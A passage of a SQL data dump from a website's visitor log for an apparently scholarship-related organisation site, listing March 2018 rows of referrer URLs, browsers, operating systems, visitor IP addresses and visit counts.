DZ29aZVoybXlPU042M3V2T3FRcC1pOFppdnBLN3RVeDB5UFYwM0ZBSGowWW1pLUZCTWpYSE83QSws&sign=4c59b2f17511bd96b671ffe369f3c20b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.220.22','000',2,0),(27397,'2018-03-25','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.210','000',1,0),(27398,'2018-03-25','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.14','000',1,0),(27399,'2018-03-25','https://zelena-mriya.com.ua/','MSIE','Windows','5.5','','46.118.113.100','000',1,0),(27400,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','75.176.10.208','000',1,0),(27401,'2018-03-25','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.6','000',1,0),(27402,'2018-03-25','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','71.244.128.30','000',2,0),(27403,'2018-03-25','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',2,0),(27404,'2018-03-25','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','209.59.74.131','000',1,0),(27405,'2018-03-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1737.ISXBT9CbwwvuyGrGg4-n5EBHd6UKtraEi74C1kVTZiY.87c25326b68ca0e0c0725544ac18d0dac246b3a0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041Qm5Cb3lLTTZLRHNYV3ZUdWlNV2dyTUlMSk1kbUdpZmJzYnFKOFYtZEJ2dyws&sign=b69eaa746677b0e69761362955d548fa&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.103','000',2,0),(27406,'2018-03-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1737.b1OnF_Pu472vLg82gaKqwalceUwxcbh77kSFXkaeXW0.2056ab4310c19cd0c99be3761f49a893a6bcb06f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043a3NkSW10bEh6Q1VBbEF6WE51Qy1DUnBQSnFLT3loOU9QZGc3eGJERE9aZyws&sign=e621c3ffd5efb367aded96482c387089&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.200.75.59','000',2,0),(27407,'2018-03-25','https://zphiblgz.org/','Chrome','Macintosh','63.0.3239.132','','189.7.237.212','000',3,0),(27408,'2018-03-25','https://zphiblgz.org','Safari','iPhone','11.0','','68.134.7.126','000',3,0),(27409,'2018-03-25','https://zphiblgz.org','Safari','iPhone','11.0','','100.15.146.12','000',30,0),(27410,'2018-03-25','https://zphiblgz.org','AppleWebKit','Windows','534','','207.46.13.159','000',1,0),(27411,'2018-03-25','https://outlook.live.com/','Chrome','Chrome OS','59.0.3071.134','','96.234.182.174','000',2,0),(27412,'2018-03-25','https://4inn.ru/','MSIE','Windows','6.0','','37.115.112.228','000',3,0),(27413,'2018-03-25','https://zphiblgz.org','Edge','Windows','16.16299','','71.121.149.194','000',3,0),(27414,'2018-03-25','https://zphiblgz.org/','Chrome','Windows','63.0.3223.8','','31.130.7.55','000',2,0),(27415,'2018-03-25','https://zphiblgz.org/','Firefox','Windows','40.1','','31.130.7.55','000',2,0),(27416,'2018-03-25','https://www.bing.com/','MSIE','Windows','11.0','','100.15.146.12','000',8,0),(27417,'2018-03-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(27418,'2018-03-25','https://www.google.com/','Safari','iPhone','604.1','','174.205.41.195','000',13,0),(27419,'2018-03-25','https://www.google.com/','Chrome','Windows','65.0.3325.181','','71.166.46.215','000',6,0),(27420,'2018-03-25','https://zphiblgz.org','Safari','iPhone','11.0','','166.137.244.119','000',2,0),(27421,'2018-03-25','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','107.77.204.171','000',4,0),(27422,'2018-03-25','https://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.205.5.245','000',1,0),(27423,'2018-03-25','https://zphiblgz.org','Chrome','Windows','18.6.872.0','','81.27.118.158','000',2,0),(27424,'2018-03-25','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(27425,'2018-03-25','https://zphiblgz.org','Safari','iPhone','11.0','','73.213.32.232','000',12,0),(27426,'2018-03-25','https://zphiblgz.org','Safari','iPhone','11.0','','69.143.112.10','000',5,0),(27427,'2018-03-25','https://zphiblgz.org','Safari','iPhone','11.0','','71.121.248.185','000',4,0),(27428,'2018-03-25','https://www.google.com/','Safari','Macintosh','11.0.3','','73.212.64.200','000',13,0),(27429,'2018-03-25','https://zphiblgz.org/scholarship/application/','Firefox','Windows','42.0','','46.161.9.56','000',3,0),(27430,'2018-03-25','https://www.google.com/','Safari','Macintosh','11.0.3','','75.65.241.23','000',2,0),(27431,'2018-03-25','https://zphiblgz.org','Safari','iPhone','11.0','','100.16.174.187','000',5,0),(27432,'2018-03-25','https://www.google.com/','Chrome','Windows','65.0.3325.181','','100.16.174.187','000',18,0),(27433,'2018-03-25','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.35','000',1,0),(27434,'2018-03-25','https://zphiblgz.org/scholarship/recommendation/','Chrome','Windows','65.0.3325.181','','73.200.184.133','000',2,0),(27435,'2018-03-25','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(27436,'2018-03-25','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(27437,'2018-03-25','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(27438,'2018-03-25','https://zphiblgz.org','AppleWebKit','Windows','534','','207.46.13.208','000',2,0),(27439,'2018-03-25','https://zphiblgz.org','MSIE','Windows','11.0','','50.202.157.138','000',6,0),(27440,'2018-03-25','https://zphiblgz.org','NYU','Unknown','Unknown','','5.188.203.40','000',2,0),(27441,'2018-03-25','https://zphiblgz.org','Firefox','Macintosh','57.0','','71.127.150.254','000',6,0),(27442,'2018-03-25','https://zphiblgz.org','Chrome','Windows','33.0.1768.7','','192.3.135.26','000',2,0),(27443,'2018-03-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(27444,'2018-03-25','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','198.27.80.144','000',47,0),(27445,'2018-03-25','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(27446,'2018-03-25','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(27447,'2018-03-25','http://deart-13.ru/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(27448,'2018-03-25','http://m.facebook.com/','Chrome','Android','65.0.3325.109','','73.87.137.159','000',1,0),(27449,'2018-03-25','https://www.google.com/','Chrome','Windows','65.0.3325.181','','71.126.169.163','000',2,0),(27450,'2018-03-25','https://zphiblgz.org','SamsungBrowser','Android','7.0','','96.255.12.223','000',4,0),(27451,'2018-03-25','https://zphiblgz.org','Safari','iPhone','11.0','','107.77.204.35','000',1,0),(27452,'2018-03-25','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(27453,'2018-03-25','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','188.240.208.26','000',1,0),(27454,'2018-03-25','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(27455,'2018-03-25','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.56.110','000',2,0),(27456,'2018-03-25','https://mtsguru.ru/','MSIE','Windows','6.0','','178.137.86.152','000',1,0),(27457,'2018-03-25','https://zphiblgz.org/','Firefox','Windows','58.0','','179.210.212.17','000',2,0),(27458,'2018-03-25','https://zphiblgz.org','Firefox','Linux','57.0','','192.198.80.227','000',1,0),(27459,'2018-03-25','https://infodocsportal.com/','MSIE','Windows','5.0','','134.249.55.53','000',2,0),(27460,'2018-03-25','https://owa.howardcc.edu/owa/','Chrome','Windows','65.0.3325.181','','73.129.149.233','000',7,0),(27461,'2018-03-26','https://vzube.com/','MSIE','Windows','6.0','','178.137.86.152','000',5,0),(27462,'2018-03-26','https://zphiblgz.org','Firefox','Windows','40.1','','36.73.242.96','000',2,0),(27463,'2018-03-26','http://elementspluss.ru/','MSIE','Windows','6.0','','46.118.113.100','000',5,0),(27464,'2018-03-26','https://zphiblgz.org','Safari','iPhone','11.0','','71.121.248.185','000',8,0),(27465,'2018-03-26','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','107.77.204.171','000',2,0),(27466,'2018-03-26','https://zphiblgz.org','MSIE','Windows','11.0','','50.253.54.125','000',8,0),(27467,'2018-03-26','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.85','000',2,0),(27468,'2018-03-26','https://www.google.com/','Safari','Macintosh','11.0.3','','50.225.39.82','000',12,0),(27469,'2018-03-26','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.177','000',1,0),(27470,'2018-03-26','https://zphiblgz.org','Safari','iPhone','8.0','','123.125.71.77','000',2,0),(27471,'2018-03-26','https://zphiblgz.org','Safari','iPhone','8.0','','123.125.67.215','000',1,0),(27472,'2018-03-26','https://zphiblgz.org','Firefox','Macintosh','46.0','','50.225.39.81','000',3,0),(27473,'2018-03-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1738.GW793KUf3C525IW3cVXn25lg7cdu5k2PKC-l1650pxE.fd0a3843eeb77c62e5f6ea50880a4353180b75e0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041YUlKb3dxcmxnWDZYMDFYOE0xQnUwbExiUUVsWU56MlZyd2t4QVVJNnYwQSws&sign=aca2841995c1ba8e61a5244690dedc8d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','198.199.92.200','000',2,0),(27474,'2018-03-26','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',3,0),(27475,'2018-03-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1738.foHsnO_0YgARdaFgMonDGcKpuokXKsOuXwNjNwX8Sdg.e0c9137a29170bfa14b126b9e1ae161ea7664bcb&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040WGpJSzJyZ21rc3lhdlFvcmpkcHhjZjBVVUxxOUpERVA3dDlRbTRpYXVVUSws&sign=6b1d36378cd0f16d5957d382459028e4&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.75.10.253','000',2,0),(27476,'2018-03-26','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','50.225.39.86','000',12,0),(27477,'2018-03-26','https://www.google.com/','Chrome','Windows','65.0.3325.181','','50.225.39.79','000',25,0),(27478,'2018-03-26','https://zphiblgz.org','Firefox','Macintosh','59.0','','216.145.11.94','000',2,0),(27479,'2018-03-26','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','50.225.39.76','000',4,0),(27480,'2018-03-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1738.uaUDIKWFe2EheO0nqEXtK4B0-mS54TnUNW2I0KC1uPQ.c6a3c445a24267e3f45afd8c47f4cb9bd5aff1d8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041a3otMjhkYTZnWUZ1amdGZVJnVmRJc19yTmxvdUhvaTFUckY0OG9sYTEyZyws&sign=b23c7ad9974955528ee0c569d0c7d0e5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','13.229.140.183','000',2,0),(27481,'2018-03-26','http://komputers-best.ru/','Unknown','Unknown','Unknown','','46.119.121.22','000',1,0),(27482,'2018-03-26','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','68.134.29.211','000',6,0),(27483,'2018-03-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1738.1VxkDb2_uUhkc4YVKt2gHrz6bOBmaih_T7tpH8C7Fpg.26c1a89fe9fd6425eda6d83f02ec6c1a6621818c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Y0lkWHM4c042SkRtZ2NodUZSOEJPM2J3dEtudGxra1dUVnZBLXlTR2xlQSws&sign=4a7d7d38d1bf6c1bb7dad1a5fef2c8f0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.176.11','000',2,0),(27484,'2018-03-26','https://www.google.com/','Chrome','Windows','65.0.3325.181','','71.126.169.163','000',3,0),(27485,'2018-03-26','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.140','','50.225.39.80','000',7,0),(27486,'2018-03-26','https://zphiblgz.org/','AppleWebKit','Windows','534','','40.77.179.32','000',1,0),(27487,'2018-03-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1738.c_zXXeEx4bfzlTTiUUudaxQuvUrzCnlCIuRAp_j--pQ.d76fe237b42c8e58123bc238c6cc803b6d46ac9a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040cUlQRVY4OHk5YnBpZ0w5U2hYZEVwUXdQT2pxQWMxamlTNVUzam1nMUJidyws&sign=31457781524e10cc874afe68ec480d6c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.191','000',2,0),(27488,'2018-03-26','https://zphiblgz.org','Firefox','Linux','24.0','','172.58.185.198','000',6,0),(27489,'2018-03-26','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','50.225.39.88','000',4,0),(27490,'2018-03-26','https://www.google.com/','Chrome','Windows','65.0.3325.181','','50.225.39.81','000',7,0),(27491,'2018-03-26','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','50.225.39.82','000',2,0),(27492,'2018-03-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1738.5BJfpwQu1bCYTUxkmAqiwoTv_DTsJgsJkZB2szKx9eI.7f548be3a9bcf7a004259738ce1d6b4b6e6d7bad&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043TFpoc3RWYmduNHRfS0VFMUxBejVPZzJ0cUlHLUFGNnBoZWwxbzJRQ01Ydyws&sign=612b89829ed9114fa71a7ea52604d0a1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.124.14','000',2,0),(27493,'2018-03-26','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','192.198.80.227','000',2,0),(27494,'2018-03-26','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',8,0),(27495,'2018-03-26','https://zphiblgz.org','AppleWebKit','Windows','534','','207.46.13.208','000',2,0),(27496,'2018-03-26','https://zphiblgz.org','MSIE','Windows','11.0','','50.202.157.138','000',21,0),(27497,'2018-03-26','https://zphiblgz.org','Firefox','Windows','59.0','','198.51.197.42','000',4,0),(27498,'2018-03-26','https://zphiblgz.org','MSIE','Windows','11.0','','198.51.197.42','000',1,0),(27499,'2018-03-26','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','208.76.113.2','000',10,0),(27500,'2018-03-26','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',2,0),(27501,'2018-03-26','(null)','Firefox','Windows','33.0','','162.243.69.215','000',1,0),(27502,'2018-03-26','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(27503,'2018-03-26','https://sovetskie-plakaty.ru/','Opera','Windows','9.0','','178.159.37.55','000',3,0),(27504,'2018-03-26','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(27505,'2018-03-26','https://zphiblgz.org','Edge','Windows','16.16299','','73.129.22.251','000',8,0),(27506,'2018-03-26','https://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',10,0),(27507,'2018-03-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(27508,'2018-03-26','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(27509,'2018-03-26','https://documentbase.net/','MSIE','Windows','6.0','','134.249.55.53','000',2,0),(27510,'2018-03-26','https://zphiblgz.org','Safari','iPhone','11.0','','172.58.184.39','000',3,0),(27511,'2018-03-26','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.31','000',1,0),(27512,'2018-03-26','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','173.64.115.6','000',4,0),(27513,'2018-03-26','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','71.244.128.30','000',2,0),(27514,'2018-03-26','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(27515,'2018-03-26','https://zphiblgz.org/scholarship/application/','Chrome','Windows','65.0.3325.162','','73.200.187.175','000',3,0),(27516,'2018-03-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','205.201.132.14','000',4,0),(27517,'2018-03-26','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(27518,'2018-03-26','https://outlook.live.com/','Chrome','Chrome OS','59.0.3071.134','','96.234.182.174','000',2,0),(27519,'2018-03-26','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(27520,'2018-03-26','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(27521,'2018-03-26','http://magnetic-bracelets.ru/','Opera','Windows','9.0','','46.119.121.22','000',3,0),(27522,'2018-03-26','https://zphiblgz.org/scholarship/application/','Chrome','Windows','65.0.3325.162','','73.172.63.178','000',1,0),(27523,'2018-03-26','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','172.58.201.188','000',1,0),(27524,'2018-03-26','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','173.69.167.162','000',5,0),(27525,'2018-03-26','https://zphiblgz.org/scholarship/recommendation/','Chrome','Windows','65.0.3325.181','','73.200.184.133','000',8,0),(27526,'2018-03-26','https://zphiblgz.org','MSIE','Windows','8.0','','209.222.83.71','000',3,0),(27527,'2018-03-26','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(27528,'2018-03-26','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','5.9.17.118','000',1,0),(27529,'2018-03-26','https://zphiblgz.org','Safari','Macintosh','6.0.3','','136.243.17.161','000',1,0),(27530,'2018-03-26','https://zphiblgz.org','Safari','Macintosh','11.0.2','','88.198.43.207','000',1,0),(27531,'2018-03-26','http://zphiblgz.org/scholarship/','Chrome','Windows','64.0.3282.186','','73.173.254.31','000',9,0),(27532,'2018-03-26','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.112','000',1,0),(27533,'2018-03-26','https://zphiblgz.org','Safari','iPhone','8.0','','220.181.108.91','000',1,0),(27534,'2018-03-26','https://zphiblgz.org/','Firefox','Windows','34.0','','82.193.109.243','000',2,0),(27535,'2018-03-26','https://zphiblgz.org/scholarship/','Chrome','Windows','4.0.221.7','','173.234.58.131','000',1,0),(27536,'2018-03-26','https://zphiblgz.org/scholarship/','Firefox','Windows','3.0.14','','173.234.58.237','000',1,0),(27537,'2018-03-26','https://zphiblgz.org','Safari','iPhone','11.0','','100.18.23.23','000',2,0),(27538,'2018-03-26','https://zphiblgz.org','Safari','iPhone','11.0','','173.69.179.86','000',7,0),(27539,'2018-03-26','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(27540,'2018-03-26','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(27541,'2018-03-26','https://www.google.com/','Safari','iPhone','11.0','','71.179.85.175','000',2,0),(27542,'2018-03-26','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.110.204','000',2,0),(27543,'2018-03-27','http://stat.lviv.ua/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(27544,'2018-03-27','http://www.columb.net.ua/','Opera','Windows','7.54','','46.119.121.22','000',3,0),(27545,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.31','000',1,0),(27546,'2018-03-27','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(27547,'2018-03-27','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.31','000',2,0),(27548,'2018-03-27','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(27549,'2018-03-27','zphiblgz.org','Chrome','Windows','50.0.2661.75','','31.211.86.13','000',1,0),(27550,'2018-03-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1739.yLPfjdyKVJKf3KinR3IVAIpEWpO50KRQL9pURNVqXUM.5f8c5f00efd9e2aec9effbd7879f19191cdf8e2d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041czJBMmFkM2lpY3lFQ0lVZHJ5d1EtRkc4a2x1V1IxZ1ZJV2piQmktUWw4dyws&sign=cdfb7637b9c4b2a02c923011c1c63367&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.14.95','000',2,0),(27551,'2018-03-27','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(27552,'2018-03-27','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(27553,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',3,0),(27554,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.84','','192.198.80.227','000',1,0),(27555,'2018-03-27','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.27','000',1,0),(27556,'2018-03-27','https://www.google.com/','Chrome','Windows','65.0.3325.181','','50.225.39.81','000',6,0),(27557,'2018-03-27','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.82','000',7,0),(27558,'2018-03-27','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1740.jKLNR87AHNcTjQwcH3byxD_BSmzyHZLq5fnreO7au4N44e-wWf6oaLX18GfxWeQb.0a5ad97b7add1c613706f60bcada651c8e4f6490&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4U252TFdDRjJQZkEyRnN1T1J4blBpbDRoSUI4Zi1iZVJrTWNzRXVCSXdvMWI4ZTh6RHRWakJyM1lZRy1JdktTYw&b64e=2&sign=188693c09ae9b688384e291ff4895202&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTT0UIgXJ6kXZqzZB-ycL2wuAHg2yZY2ActtxcesN6S6BXDdvg20WDj3x-N1qPKdISPzP7anjdoMsM812YZR4Fdt62G7s-QOrLEvEYTrwAlN_g5Ky7QU6zwFg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiEJ6HvhX81RyFJnLG9oqvAdRpYz8dhiW7bxdrS0zyDbwiGM6NSZLwrZoBYQ0XoVjTNQ&l10n=ru&cts=1522150101054&mc=3.15585876373','MSIE','Windows','10.0','','176.14.198.184','000',1,0),(27559,'2018-03-27','https://exdocsfiles.com/','MSIE','Windows','6.0','','134.249.55.53','000',1,0),(27560,'2018-03-27','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',1,0),(27561,'2018-03-27','https://kozhasobak.com/','Opera','Windows','7.11','','134.249.55.53','000',1,0),(27562,'2018-03-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1739.tM3xtUytf_sb_53AdXp762G34xMdXemWoPzN8ua_Qv0.d25d79232bbb052e459cfd3e0ebfdb1e6132e548&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042OGZlV3NVRkhJOVpRQ0RleWNZcTVlNXVTUk5JTjFoSHExSlh0ckdWYkdnUSws&sign=6f715efd4422b34714c3d2f237c67047&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.189.123','000',2,0),(27563,'2018-03-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1739.vxpl1b5Mia-sZx2213tahHVUrh_ITvc4oss3sB7A2pE.feb3430b12588857df7331b43869ac3b81d03b44&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041Z3lrcVBITE9wYlBjdm1OQUxiNDBaaW5GNGZGcTdzLWFseWxQUGdkX29QZyws&sign=3e0acb73c32d9b998e071a897cb91bc6&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.203','000',2,0),(27564,'2018-03-27','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','50.225.39.88','000',2,0),(27565,'2018-03-27','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(27566,'2018-03-27','https://zphiblgz.org','Firefox','Windows','45.0','','50.225.39.82','000',3,0),(27567,'2018-03-27','https://zphiblgz.org','AppleWebKit','Windows','534','','207.46.13.92','000',1,0),(27568,'2018-03-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1739.fIidnEMumHlkYdGGeYIZoX0WqE4s2bgSqo37PC4UEog.0311224d1718e1c491a2671d5479f47246ae0b57&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040WHhpSF9SSDV5eGo0YkItQlBWeWhEQlJxNkVwTmRDMVVwbkRfTHdZVHFldyws&sign=04c38ad11cdf3017598f5e9e7b2a317b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.35.92','000',2,0),(27569,'2018-03-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','205.201.132.14','000',8,0),(27570,'2018-03-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1739.1PF5bQCBO2x-PkxtK3zWB9knC6Yx_Gqh5QSBCFdKKvk.6f1addfa95280653e82f2a7b6cebcb19e7021eff&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042NDNQTDFEZVVPRXd2Z